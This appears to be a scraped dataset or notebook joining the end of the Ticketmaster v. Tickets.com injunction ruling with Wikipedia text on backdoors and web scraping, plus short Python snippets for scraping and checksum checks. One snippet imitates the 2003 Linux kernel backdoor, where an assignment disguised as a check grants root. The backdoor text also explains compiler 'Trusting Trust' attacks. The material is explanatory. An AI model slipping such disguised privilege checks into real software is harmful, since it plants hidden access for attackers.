Except for the URL, the copying is transitory and temporary and is not used directly in competition with TM, but it is copying and it would violate the Copyright Act if not justified. The fact that irreparable injury is hard to see even with a magnifying glass would not prevent an injunction because of the doctrine that irreparable injury is presumed if there is copying. The copying is intentional and done for commercial purposes even if the copied material is not sold as that of the copier. The copying, as summarized above, takes place as a part of the process of taking the (unprotectable) facts from TM's web sites so as to turn those facts into facts published by T.Com in its own format. At oral argument, counsel explained that by the nature of the way computers work, it is necessary to copy the electronic signals temporarily on the copying computer's RAM in order to extract the factual data present thereon. It is, therefore, a necessary part of the process by which T.Com efficiently takes basic facts from the TM websites, retains the electronic signals from TM on its own computer for a few second, during which T.Com's own computer program strips the signals of the basic facts, and then discards the copied electronic signals of TM as of no further use (except for the URL, discussed below). What prevents the issuance of a preliminary injunction on these facts is the "fair use" doctrine as recognized by the Ninth Circuit in Connectix Corp. 9Cir'00 203 F3d 596 and certain prior cases. Connectix holds that copying for reverse engineering to obtain non-protectable information is permitted by the fair use doctrine in certain circumstances. Reverse engineering to get at unprotected functional elements is not the same process as used here but the analogy seems to apply. The copy is not used competitively. It is destroyed after its limited function is done. It is used only to facilitate obtaining non-protectable data here the basic factual data. It may not be the only way of obtaining that data (i.e., a thousand scriveners with pencil and paper could do the job given time), but it is the most efficient way, not held to be an impediment in Connectix. TM makes the point that copying the URL (the electronic address to the web pages) which is not destroyed, but retained and used, is copying protected material. The court doubts that the material is protectable because the URL appears to contain functional and factual elements only and not original material. It appears likely to the court that plaintiff's odds on prevailing on the fair use doctrine at trial are sufficiently low that a preliminary injunction should not be granted even with the presumption of irreparable injury which goes with copyright infringement. The other point dealing with copyright is the so-called "hot news" exception. As a basic exception to the rule that factual information is not protectable, an exception developed in the case of competing news organizations selling news to customers (newspapers) in competition with one another. Certain protections were allowed to prevent wholesale thievery of news by one organization from another. Here, it is suggested that at least some of the event news is "hot" that is, the event is sold out within hours or minutes of the tickets becoming available. This exception is not made out here. Even if such a hot event occurs (the court is informally informed that this is not rare) in a TM controlled event, the reference for ticket sales will be to TM, who sells the tickets in any event. 
Second, there is no showing that this situation occurs often enough to be of commercial significance. Accordingly, a preliminary injunction will not be issued on the copyright aspects of the case. There could be a difference at trial, and the difference could depend on the necessity of downloading the electronic signals onto the T.Com computers for purposes of extracting the unprotected factual information. The trespass aspects of the case have taken on new significance in the light of Judge Whyte's opinion in eBay on May 24, which was immediately followed by a deluge of additional papers in this court. It must be said that the trespass question presented and decided in eBay bore no resemblance to the trespass questions considered by this court on the motion to dismiss last March. What this court decided (at least, what it thought it decided) was that the taking of factual information from a public source was not a trespass, and if taking the information from a publically sic available computer was a state law trespass, it fell afoul of the presumption aspects of the Copyright Act. However, no question of invasion of the computer by spiders, and possible consequent damage to the computer was presented to this court at least no such question was decided. So, defendant's argument that it has already been decided and is law of the case and plaintiff's argument that the court can always reconsider a wrong decision have no place it is a new one to this court. The court is impressed by the original and resourceful thinking of Judge Whyte; it is always difficult to attempt to apply established law to brand new facts with other established policies tugging and pulling one in various directions. Not only that, the court agrees with much of what Judge Whyte says. The computer is a piece of tangible personal property. It is operated by mysterious electronic impulses which did not exist when the law of trespass to chattels was developed, but the principles should not be too different. If the electronic impulses can do damage to the computer or to its function in a comparable way to taking a hammer to a piece of machinery, then it is no stretch to recognize that damage as trespass to chattels and provide a legal remedy for it. Judge Whyte in eBay found the damage in the occupation of a portion of the capacity of the computer to handle routine business and conjectured that approval of that use would bring many more parasitic like copies of the defendant feeding that computer to a clogged level upon the information expensively developed by eBay, the net result likely being severe damage to the function of the computer and thus the business of eBay. Thus, the injunction was issued to prevent the use of the spiders by the defendant in that case. It is noted that the harm to the equipment was foreseen to its intended function, not the physical characteristics of the computer. A basic element of trespass to chattels must be physical harm to the chattel (not present here) or some obstruction of its basic function (in the court's opinion not sufficiently shown here). TM has presented statistics showing an estimate of the number of hits by T.Com spiders in its own computers and has presented rough comparison with the total use of the computers by all users of the computers. The comparative use by T.Com appears very small and there is no showing that the use interferes to any extent with the regular business of TM. 
If it did, an injunction might well issue, but should not with a showing of lack of harm or foreseeable harm. Nor here is the specture sic of dozens or more parasites joining the fray, the cumulative total of which could affect the operation of TM's business. Further, the showing here is that the effect of T.Com's taking of factual data from TM is not to operate in direct competition with TM it is not selling the data or the tickets. While TM sees some detriment in T.Com's operation (possibly in the loss of advertising revenue), there is also a beneficial effect in the referral of customers looking for tickets to TM events directly to TM. (In fact, other companies, who presumably pay a fee, are allowed to refer customers directly to the internal web pages of TM, presumably leading to sale of TM tickets despite hypothetical loss of advertising revenue by not going through the TM home web page.) Accordingly, while the trespass theory has some merit, there is insufficient proof of its elements in this case to justify a preliminary injunction. Further, there appears to be a lack of irreparable injury (required for this theory). The remaining contentions may be disposed of with fewer words. The contract theory lacks sufficient proof of agreement by defendant to be taken seriously as a ground for preliminary injunction. Besides, a preliminary injunction to prevent a breach of contract is an almost unheard of thing, being the equivalent of specific enforcement by preliminary injunction. There is insufficient irreparable injury to even consider such a proposition. The various Lanham Act theories lack sufficient facts to support them. T.Com does not pass itself off as TM. In fact, it carefully says that it cannot sell the tickets but will refer the buyer to another broker (here, read TM) who can. The customer ends up on the TM home web page filed with TM logos. The customer is unlikely to be misled. Neither is there evidence of reverse palming off. T.Com in no way pretends that it is TM or acting for it. The false advertising claim is supported by a few mistakes in phone numbers, etc., which appear to be stray errors. This is not worth an injunction. The other claims appear to have no basis worthy of an injunction. Preliminary injunction denied. |
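The spidering process the opinion describes (fetch an interior event page, hold a temporary copy, keep only the bare facts and the page's URL, and discard the rest) maps directly onto the tools used in this document. Below is a minimal, hypothetical sketch of that pattern; the URL and the choice of fields are placeholders, and whether such crawling is permissible for a given site depends on its terms and on the kind of legal analysis quoted above.

# Sketch of crawl-and-extract: fetch a page, pull out factual fields, keep
# only those facts plus the URL; the fetched HTML copy is not retained.
import requests
from bs4 import BeautifulSoup

def extract_event_facts(url):
    html = requests.get(url, timeout=10).text        # temporary in-memory copy
    soup = BeautifulSoup(html, "html5lib")
    facts = {
        "url": url,
        "title": soup.title.get_text(strip=True) if soup.title else None,
        # real selectors would target venue, date, time, and price fields
    }
    return facts                                      # raw HTML goes out of scope here

# facts = extract_event_facts("https://example.com/event/12345")   # hypothetical URL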
269 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Backdoor_(computing) | A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device (e.g. a home router), or its embodiment (e.g. part of a cryptosystem, algorithm, chipset, or even a "homunculus computer"—a tiny computer-within-a-computer such as that found in Intel's AMT technology). 1 2 Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptosystems. From there it may be used to gain access to privileged information like passwords, corrupt or delete data on hard drives, or transfer information within autoschediastic networks. A backdoor may take the form of a hidden part of a program, 3 a separate program (e.g. Back Orifice may subvert the system through a rootkit), code in the firmware of the hardware, 4 or parts of an operating system such as Windows. 5 6 7 Trojan horses can be used to create vulnerabilities in a device. A Trojan horse may appear to be an entirely legitimate program, but when executed, it triggers an activity that may install a backdoor. 8 Although some are secretly installed, other backdoors are deliberate and widely known. These kinds of backdoors have "legitimate" uses such as providing the manufacturer with a way to restore user passwords. Many systems that store information within the cloud fail to create accurate security measures. If many systems are connected within the cloud, hackers can gain access to all other platforms through the most vulnerable system. 9 Default passwords (or other default credentials) can function as backdoors if they are not changed by the user. Some debugging features can also act as backdoors if they are not removed in the release version. 10 In 1993, the United States government attempted to deploy an encryption system, the Clipper chip, with an explicit backdoor for law enforcement and national security access. The chip was unsuccessful. 11 Recent proposals to counter backdoors include creating a database of backdoors' triggers and then using neural networks to detect them. 12 The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference. 13 They noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities and permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning (see trapdoor function), and thus the term "backdoor" is now preferred, only after the term trapdoor went out of use. More generally, such security breaches were discussed at length in a RAND Corporation task force report published under DARPA sponsorship by J.P. Anderson and D.J. Edwards in 1970. 14 While initially targeting the computer vision domain, backdoor attacks have expanded to encompass various other domains, including text, audio, ML-based computer-aided design, and ML-based wireless signal classification. Additionally, vulnerabilities in backdoors have been demonstrated in deep generative models, reinforcement learning (e.g., AI GO), and deep graph models. 
These broad-ranging potential risks have prompted concerns from national security agencies regarding their potentially disastrous consequences. 15 A backdoor in a login system might take the form of a hard coded user and password combination which gives access to the system. An example of this sort of backdoor was used as a plot device in the 1983 film WarGames, in which the architect of the "WOPR" computer system had inserted a hardcoded password-less account which gave the user access to the system, and to undocumented parts of the system (in particular, a video game-like simulation mode and direct interaction with the artificial intelligence). Although the number of backdoors in systems using proprietary software (software whose source code is not publicly available) is not widely credited, they are nevertheless frequently exposed. Programmers have even succeeded in secretly installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if not actual permission. There are a number of cloak and dagger considerations that come into play when apportioning responsibility. Covert backdoors sometimes masquerade as inadvertent defects (bugs) for reasons of plausible deniability. In some cases, these might begin life as an actual bug (inadvertent error), which, once discovered are then deliberately left unfixed and undisclosed, whether by a rogue employee for personal advantage, or with C-level executive awareness and oversight. It is also possible for an entirely above-board corporation's technology base to be covertly and untraceably tainted by external agents (hackers), though this level of sophistication is thought to exist mainly at the level of nation state actors. For example, if a photomask obtained from a photomask supplier differs in a few gates from its photomask specification, a chip manufacturer would be hard-pressed to detect this if otherwise functionally silent; a covert rootkit running in the photomask etching equipment could enact this discrepancy unbeknown to the photomask manufacturer, either, and by such means, one backdoor potentially leads to another. note 1 In general terms, the long dependency-chains in the modern, highly specialized technological economy and innumerable human-elements process control-points make it difficult to conclusively pinpoint responsibility at such time as a covert backdoor becomes unveiled. Even direct admissions of responsibility must be scrutinized carefully if the confessing party is beholden to other powerful interests. Many computer worms, such as Sobig and Mydoom, install a backdoor on the affected computer (generally a PC on broadband running Microsoft Windows and Microsoft Outlook). Such backdoors appear to be installed so that spammers can send junk e-mail from the infected machines. Others, such as the Sony BMG rootkit, placed secretly on millions of music CDs through late 2005, are intended as DRM measures—and, in that case, as data-gathering agents, since both surreptitious programs they installed routinely contacted central servers. A sophisticated attempt to plant a backdoor in the Linux kernel, exposed in November 2003, added a small and subtle code change by subverting the revision control system. 16 In this case, a two-line change appeared to check root access permissions of a caller to the sys wait4 function, but because it used assignment instead of equality checking , it actually granted permissions to the system. 
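The 2003 kernel incident just described turned on a single character: assignment ('=') where a comparison ('==') was expected, in C. Python's walrus operator ':=' can mimic the shape of that bug, so the toy below is offered only as an analogy to show why the change is so easy to misread; it is not the original code, and the constant and names are invented.

# Analogy only: a "permissions check" that silently assigns instead of comparing.
WCLONE_WALL = 0x60            # stand-in for the magic option combination

def backdoored_check(options, uid):
    # (uid := 0) *sets* uid to 0 ("root") and evaluates as falsy, so the
    # reject branch never runs; the caller's uid has been escalated anyway.
    if options == WCLONE_WALL and (uid := 0):
        return "reject", uid
    return "allow", uid

print(backdoored_check(WCLONE_WALL, 1000))  # ('allow', 0)   <- uid became 0
print(backdoored_check(0, 1000))            # ('allow', 1000)

A reviewer skimming the diff sees what looks like an ordinary equality check, which is exactly the plausible deniability the text describes.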
This difference is easily overlooked, and could even be interpreted as an accidental typographical error, rather than an intentional attack. 17 18 In January 2014, a backdoor was discovered in certain Samsung Android products, like the Galaxy devices. The Samsung proprietary Android versions are fitted with a backdoor that provides remote access to the data stored on the device. In particular, the Samsung Android software that is in charge of handling the communications with the modem, using the Samsung IPC protocol, implements a class of requests known as remote file server (RFS) commands, that allows the backdoor operator to perform via modem remote I O operations on the device hard disk or other storage. As the modem is running Samsung proprietary Android software, it is likely that it offers over-the-air remote control that could then be used to issue the RFS commands and thus to access the file system on the device. 19 Harder to detect backdoors involve modifying object code, rather than source code—object code is much harder to inspect, as it is designed to be machine-readable, not human-readable. These backdoors can be inserted either directly in the on-disk object code, or inserted at some point during compilation, assembly linking, or loading—in the latter case the backdoor never appears on disk, only in memory. Object code backdoors are difficult to detect by inspection of the object code, but are easily detected by simply checking for changes (differences), notably in length or in checksum, and in some cases can be detected or analyzed by disassembling the object code. Further, object code backdoors can be removed (assuming source code is available) by simply recompiling from source on a trusted system. Thus for such backdoors to avoid detection, all extant copies of a binary must be subverted, and any validation checksums must also be compromised, and source must be unavailable, to prevent recompilation. Alternatively, these other tools (length checks, diff, checksumming, disassemblers) can themselves be compromised to conceal the backdoor, for example detecting that the subverted binary is being checksummed and returning the expected value, not the actual value. To conceal these further subversions, the tools must also conceal the changes in themselves—for example, a subverted checksummer must also detect if it is checksumming itself (or other subverted tools) and return false values. This leads to extensive changes in the system and tools being needed to conceal a single change. As object code can be regenerated by recompiling (reassembling, relinking) the original source code, making a persistent object code backdoor (without modifying source code) requires subverting the compiler itself—so that when it detects that it is compiling the program under attack it inserts the backdoor—or alternatively the assembler, linker, or loader. As this requires subverting the compiler, this in turn can be fixed by recompiling the compiler, removing the backdoor insertion code. This defense can in turn be subverted by putting a source meta-backdoor in the compiler, so that when it detects that it is compiling itself it then inserts this meta-backdoor generator, together with the original backdoor generator for the original program under attack. After this is done, the source meta-backdoor can be removed, and the compiler recompiled from original source with the compromised compiler executable: the backdoor has been bootstrapped. 
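The simplest of the detection techniques mentioned in this passage is recording a binary's length and checksum on a trusted system and re-checking later copies against those values. A minimal sketch using the standard library (the path and reference values are placeholders):

# Record a binary's length and SHA-256 once, then verify later copies.
import hashlib
from pathlib import Path

def fingerprint(path):
    data = Path(path).read_bytes()
    return len(data), hashlib.sha256(data).hexdigest()

def unchanged(path, known_length, known_sha256):
    length, digest = fingerprint(path)
    return length == known_length and digest == known_sha256

# size, digest = fingerprint("/usr/bin/login")          # record on a trusted system
# print(unchanged("/usr/bin/login", size, digest))      # verify elsewhere later

As the text stresses, this only helps if the checking tools and the recorded reference values are themselves trustworthy.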
This attack dates to a 1974 paper by Karger and Schell, 20 and was popularized in Thompson's 1984 article, entitled "Reflections on Trusting Trust"; 21 it is hence colloquially known as the "Trusting Trust" attack. See compiler backdoors, below, for details. Analogous attacks can target lower levels of the system, such as the operating system, and can be inserted during the system booting process; these are also mentioned by Karger and Schell in 1974, and now exist in the form of boot sector viruses. 20 22 A traditional backdoor is a symmetric backdoor: anyone that finds the backdoor can in turn use it. The notion of an asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology Crypto '96. An asymmetric backdoor can only be used by the attacker who plants it, even if the full implementation of the backdoor becomes public (e.g. via publishing, being discovered and disclosed by reverse engineering, etc.). Also, it is computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks have been termed kleptography; they can be carried out in software, hardware (for example, smartcards), or a combination of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology. Notably, NSA inserted a kleptographic backdoor into the Dual EC DRBG standard. 4 23 24 There exists an experimental asymmetric backdoor in RSA key generation. This OpenSSL RSA backdoor, designed by Young and Yung, utilizes a twisted pair of elliptic curves, and has been made available. 25 A sophisticated form of black box backdoor is a compiler backdoor, where not only is a compiler subverted—to insert a backdoor in some other program, such as a login program—but it is further modified to detect when it is compiling itself and then inserts both the backdoor insertion code (targeting the other program) and the code-modifying self-compilation, like the mechanism through which retroviruses infect their host. This can be done by modifying the source code, and the resulting compromised compiler (object code) can compile the original (unmodified) source code and insert itself: the exploit has been boot-strapped. This attack was originally presented in Karger Schell (1974), note 2 which was a United States Air Force security analysis of Multics, where they described such an attack on a PL I compiler, and call it a "compiler trap door". They also mention a variant where the system initialization code is modified to insert a backdoor during booting, as this is complex and poorly understood, and call it an "initialization trapdoor"; this is now known as a boot sector virus. 22 This attack was then actually implemented by Ken Thompson, and popularized in his Turing Award acceptance speech in 1983, "Reflections on Trusting Trust", 21 which points out that trust is relative, and the only software one can truly trust is code where every step of the bootstrapping has been inspected. This backdoor mechanism is based on the fact that people only review source (human-written) code, and not compiled machine code (object code). A program called a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job. 
Thompson's paper 21 describes a modified version of the Unix C compiler that would put an invisible backdoor in the Unix login command when it noticed that the login program was being compiled, and would also add this feature undetectably to future compiler versions upon their compilation as well. As the compiler itself was a compiled program, users would be extremely unlikely to notice the machine code instructions that performed these tasks. (Because of the second task, the compiler's source code would appear "clean".) What's worse, in Thompson's proof of concept implementation, the subverted compiler also subverted the analysis program (the disassembler), so that anyone who examined the binaries in the usual way would not actually see the real code that was running, but something else instead. Karger and Schell gave an updated analysis of the original exploit in 2002, and, in 2009, Wheeler wrote a historical overview and survey of the literature. note 3 In 2023, Cox published an annotated version of Thompson's backdoor source code. 27 Thompson's version was, officially, never released into the wild. However, it is believed that a version was distributed to BBN and at least one use of the backdoor was recorded. note 4 There are scattered anecdotal reports of such backdoors in subsequent years. In August 2009, an attack of this kind was discovered by Sophos labs. The W32 Induc-A virus infected the program compiler for Delphi, a Windows programming language. The virus introduced its own code to the compilation of new Delphi programs, allowing it to infect and propagate to many systems, without the knowledge of the software programmer. The virus looks for a Delphi installation, modifies the SysConst.pas file, which is the source code of a part of the standard library and compiles it. After that, every program compiled by that Delphi installation will contain the virus. An attack that propagates by building its own Trojan horse can be especially hard to discover. It resulted in many software vendors releasing infected executables without realizing it, sometimes claiming false positives. After all, the executable was not tampered with, the compiler was. It is believed that the Induc-A virus had been propagating for at least a year before it was discovered. note 5 In 2015, a malicious copy of Xcode, XcodeGhost, also performed a similar attack and infected iOS apps from a dozen of software companies in China. Globally, 4,000 apps were found to be affected. It was not a true Thompson Trojan, as it does not infect development tools themselves, but it did prove that toolchain poisoning can cause substantial damages. 30 Once a system has been compromised with a backdoor or Trojan horse, such as the Trusting Trust compiler, it is very hard for the "rightful" user to regain control of the system typically one should rebuild a clean system and transfer data (but not executables) over. However, several practical weaknesses in the Trusting Trust scheme have been suggested. For example, a sufficiently motivated user could painstakingly review the machine code of the untrusted compiler before using it. As mentioned above, there are ways to hide the Trojan horse, such as subverting the disassembler; but there are ways to counter that defense, too, such as writing a disassembler from scratch. citation needed A generic method to counter trusting trust attacks is called diverse double-compiling. The method requires a different compiler and the source code of the compiler-under-test. 
That source, compiled with both compilers, results in two different stage 1 compilers, which however should have the same behavior. Thus the same source compiled with both stage 1 compilers must then result in two identical stage 2 compilers. A formal proof is given that the latter comparison guarantees that the purported source code and executable of the compiler-under-test correspond, under some assumptions. This method was applied by its author to verify that the C compiler of the GCC suite (v. 3.0.4) contained no trojan, using icc (v. 11.0) as the different compiler. 26 In practice such verifications are not done by end users, except in extreme circumstances of intrusion detection and analysis, due to the rarity of such sophisticated attacks, and because programs are typically distributed in binary form. Removing backdoors (including compiler backdoors) is typically done by simply rebuilding a clean system. However, the sophisticated verifications are of interest to operating system vendors, to ensure that they are not distributing a compromised system, and in high-security settings, where such attacks are a realistic concern. |
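The comparison step at the heart of both checksum-based backdoor detection and diverse double-compiling reduces to checking that two independently produced binaries are bit-for-bit identical. The Python sketch below is a minimal illustration of that final check only; the file paths are hypothetical stand-ins for the two stage-2 compilers (or for a distributed binary and a trusted rebuild), and it assumes reproducible builds so that any difference is meaningful.
import hashlib

def sha256_of(path, chunk_size=1 << 20):
    # Hash the file in chunks so large binaries do not need to fit in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical outputs of a diverse double-compiling run: the compiler-under-test's
# source built by two stage-1 compilers that were themselves built by different compilers.
stage2_a = sha256_of("build_with_compiler_a/cc_stage2")
stage2_b = sha256_of("build_with_compiler_b/cc_stage2")
print("binaries match" if stage2_a == stage2_b else "MISMATCH: possible tampering or non-reproducible build")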
270 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-3 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
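As a concrete illustration of the fetch-then-extract workflow described above, the sketch below uses the requests and BeautifulSoup libraries already imported earlier in this notebook to download a page and pull out its hyperlinks; the URL is only an example, and any real scrape should respect the target site's terms and robots.txt.
import requests
from bs4 import BeautifulSoup

url = "https://example.com/"          # example target; replace as appropriate
response = requests.get(url, timeout=10)
response.raise_for_status()           # fail loudly on HTTP errors

soup = BeautifulSoup(response.text, "html5lib")
# Extraction step: collect the text and destination of every hyperlink on the page.
links = [(a.get_text(strip=True), a.get("href")) for a in soup.find_all("a", href=True)]
for text, href in links[:10]:
    print(text, "->", href)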
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
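To make the grep/regular-expression approach mentioned at the start of this passage concrete, here is a minimal Python sketch that pulls e-mail addresses and dollar amounts out of raw page text with the re module; the patterns are simplified for illustration, not fully general matchers.
import re

page_text = """Contact sales@example.com or support@example.org.
Standard plan: $19.99 per month, enterprise from $1,200."""

# Simplified patterns for illustration only.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", page_text)
prices = re.findall(r"\$\d[\d,]*(?:\.\d{2})?", page_text)

print(emails)   # ['sales@example.com', 'support@example.org']
print(prices)   # ['$19.99', '$1,200']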
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
